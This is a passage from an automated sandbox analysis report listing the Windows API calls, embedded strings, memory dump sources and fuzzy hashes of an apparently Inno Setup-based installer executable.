                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                    • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                    • API String ID: 1782028327-3855017861
                                                                                                    • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                    • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                    • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                    • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                    APIs
                                                                                                    • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                    • SaveDC.GDI32(?), ref: 00416C83
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                    • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                    • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3808407030-0
                                                                                                    • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                    • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                    • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                    • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                    • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                    • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                    • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                    • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                    • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                    • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                    • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                    APIs
                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                    • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                    • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1095203571-0
                                                                                                    • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                    • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                    • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                    • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                    Strings
                                                                                                    • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                    • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                    • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                    • API String ID: 1452528299-4018462623
                                                                                                    • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                    • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                    • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                    • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
• SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
• SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
APIs
• SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
• RealizePalette.GDI32(00000000), ref: 00414421
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
• RealizePalette.GDI32(00000000), ref: 0041443B
• ReleaseDC.USER32(00000000,00000000), ref: 00414446
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Palette$RealizeSelect$Release
• String ID:
• API String ID: 2261976640-0
APIs
  • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
  • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
  • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
  • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
• OffsetRect.USER32(?,?,?), ref: 00424DC9
• DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
• OffsetRect.USER32(?,?,?), ref: 00424E9D
  • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
  • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
  • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
  • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
• String ID: vLB
• API String ID: 1477829881-1797516613
APIs
• WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
• WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
• WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Enum$NameOpenResourceUniversal
• String ID: Z
• API String ID: 3604996873-1505515367
APIs
• SetRectEmpty.USER32(?), ref: 0044D04E
• DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
• DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: DrawText$EmptyRect
• String ID:
• API String ID: 182455014-2867612384
APIs
• GetDC.USER32(00000000), ref: 0042EF9E
  • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
• SelectObject.GDI32(?,00000000), ref: 0042EFC1
• ReleaseDC.USER32(00000000,?), ref: 0042F0A0
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: CreateFontIndirectObjectReleaseSelect
• String ID: ...\
• API String ID: 3133960002-983595016
APIs
• GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
• MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: File$Attributes$Move
• String ID: isRS-%.3u.tmp
• API String ID: 3839737484-3657609586
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
• ExitProcess.KERNEL32 ref: 00404E0D
Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: ExitMessageProcess
• String ID: Error$Runtime error at 00000000
• API String ID: 1220098344-2970929446
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                      • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                      • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                    • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                    Strings
Memory Dump Source
• Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
Similarity
• API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
• String ID: LoadTypeLib$RegisterTypeLib
• API String ID: 1312246647-2435364021
• Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
• Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
• Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
APIs
• SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
• SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
Strings
• Failed to create DebugClientWnd, xrefs: 004571D4
• Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
Similarity
• API ID: MessageSend
• String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
• API String ID: 3850602802-3720027226
• Opcode ID: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction ID: a6ca84080c04e90ac639e3db27cd2c1e4b46fe4ea5f20cae781d9f83c3d7e460
• Opcode Fuzzy Hash: 3689ec14d1edae2f57f0a744906126f7255bff4f1947e1d6bbead030c2853570
• Instruction Fuzzy Hash: 1011E770248240AFD710AB69AC85B5FBBD89B54319F15407AFA849B383D7798C18C7AE
APIs
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• GetFocus.USER32 ref: 00478757
• GetKeyState.USER32(0000007A), ref: 00478769
• WaitMessage.USER32(?,00000000,00478790,?,00000000,004787B7,?,?,00000001,00000000,?,?,?,00480402,00000000,004812C8), ref: 00478773
Strings
Similarity
• API ID: FocusMessageStateTextWaitWindow
• String ID: Wnd=$%x
• API String ID: 1381870634-2927251529
• Opcode ID: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction ID: f17a5035e7dee30901ec9a03c3a5a372f1d0714b29ccd98a4f066b2945bd060b
• Opcode Fuzzy Hash: c0ca7a1e78f0957e158d44939737d51478939e9ac1b0c689120181bc9166dade
• Instruction Fuzzy Hash: CE11C634A40244AFD704EF65DC49A9EBBF8EB49314F6184BFF409E7681DB386D00CA69
APIs
• FileTimeToLocalFileTime.KERNEL32(?), ref: 0046E618
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046E627
Strings
Similarity
• API ID: Time$File$LocalSystem
• String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
• API String ID: 1748579591-1013271723
• Opcode ID: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction ID: 5dd65cae4c1adac9d47cc9ad6336eda1851498fedff4a8a979bd050f9c4a6815
• Opcode Fuzzy Hash: 93d3f9926fe1e9ec47fc0153e923e0389e011619b8f85a7a05f57e02ab74589b
• Instruction Fuzzy Hash: A81136A440C3909ED340DF2AC04432BBAE4AB99704F44892EF8C8C6381E779C848DBB7
APIs
• SetFileAttributesA.KERNEL32(00000000,00000020), ref: 00453F83
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• MoveFileA.KERNEL32(00000000,00000000), ref: 00453FA8
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Similarity
• API ID: File$AttributesDeleteErrorLastMove
• String ID: DeleteFile$MoveFile
• API String ID: 3024442154-139070271
• Opcode ID: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction ID: b5871bee3d194af1fa843ac656f6d820fc0ba16d57580c91db5694710367c43f
• Opcode Fuzzy Hash: ad4ba0b838e9d5317ad6887f6d8cb75152b6b17696a4ed4ee46c007163692804
• Instruction Fuzzy Hash: AEF062716142045BD701FBA2D84266EA7ECDB8435EF60443BB900BB6C3DA3C9E094529
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004594A1,00000000,00459659,?,00000000,00000000,00000000), ref: 004593B1
Strings
Similarity
• API ID: CloseOpen
• String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
• API String ID: 47109696-2631785700
• Opcode ID: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
• Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
• Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
• RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
Strings
• CSDVersion, xrefs: 00483BFC
• System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
Similarity
• API ID: CloseOpenQueryValue
• String ID: CSDVersion$System\CurrentControlSet\Control\Windows
• API String ID: 3677997916-1910633163
• Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
• Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
• Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetSystemWow64DirectoryA$kernel32.dll
• API String ID: 1646373207-4063490227
• Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
• Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
• Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
• Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
APIs
• GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
• GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: ShutdownBlockReasonDestroy$user32.dll
• API String ID: 1646373207-260599015
• Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
• Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
• Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
